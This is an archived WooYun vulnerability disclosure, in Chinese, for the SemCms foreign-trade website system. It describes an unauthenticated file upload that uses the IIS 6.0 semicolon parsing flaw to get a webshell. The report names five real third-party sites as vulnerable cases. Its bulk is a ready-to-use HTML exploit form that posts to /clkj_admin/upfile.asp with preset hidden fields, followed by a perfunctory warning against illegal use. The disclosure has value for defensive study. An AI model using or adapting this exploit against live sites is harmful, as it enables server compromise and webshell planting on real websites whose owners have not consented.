乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-14: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-06-28: 厂商已经主动忽略漏洞,细节向公众公开
无需登录,构造表单可直接通过IIS6.0解析漏洞获取webshell官网:
http://www.sem-cms.com/ SemCms外贸网站管理系统官方网!
Upload Vulnerability:
/clkj_admin/upfile.asp 构造表单自定义名称为1.asp;可造成解析漏洞
Case:
http://www.yikai-auto.com/clkj_admin/upfile.asphttp://progloballight.com/clkj_admin/upfile.asphttp://www.1dragon.net/clkj_admin/upfile.asphttp://www.stdfled.com//clkj_admin/upfile.asphttp://www.apexcool.com/clkj_admin/upfile.asp
EXP:(该漏洞危害较大;请勿使用该漏洞进行非法用途;否则后果自负!)
<html><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><link href="backdoor.css" type="text/css" rel="stylesheet"><script language="javascript"><!--function mysub(){ esave.style.visibility="visible";}--></script></head><body><form name="form1" method="post" action="http://www.******.com//clkj_admin/upfile.asp" enctype="multipart/form-data" > <div id="esave" style="position:absolute; top:18px; left:40px; z-index:10; visibility:hidden"> <TABLE WIDTH=340 BORDER=0 CELLSPACING=0 CELLPADDING=0> <TR> <td width=20%></td> <TD bgcolor=#ff0000 width="60%"><TABLE WIDTH=100% height=120 BORDER=0 CELLSPACING=1 CELLPADDING=0> <TR> <td bgcolor=#ffffff align=center><font color=red>正在上传文件,请稍候...</font></td> </tr> </table></td> <td width=20%></td> </tr> </table> </div> <table width="95%" border="0" align="center" cellspacing="1" bgcolor="#FFFFFF"> <tr> <td align="center" height="50"> <strong>图片上传</strong> <input type="hidden" name="filepath" value="../Clkj_Images/upfile/"> <input type="hidden" name="filelx" value="jpg"> <input type="hidden" name="EditName" value="clkj_prpic_1"> <input type="hidden" name="FormName" value="products"> <input type="hidden" name="act" value="uploadfile"> </td> </tr> <tr > <td align="center" id="upid" height="30">自定义图片名称 <input name="imgname" type="text" id="imgname" size="20" class="tx1" > <font color="#FF0000">注意:此项为空即,随机生成图片文件名</font> </td> </tr> <tr > <td align="center" id="upid" height="50">选择文件: <input type="file" name="file1" size="45" class="tx1" value=""> <input type="submit" name="Submit" value="开始上传" onClick="javascript:mysub()"> </td> </tr> </table></form></body></html>
任意互联网案例测试
1、
未能联系到厂商或者厂商积极拒绝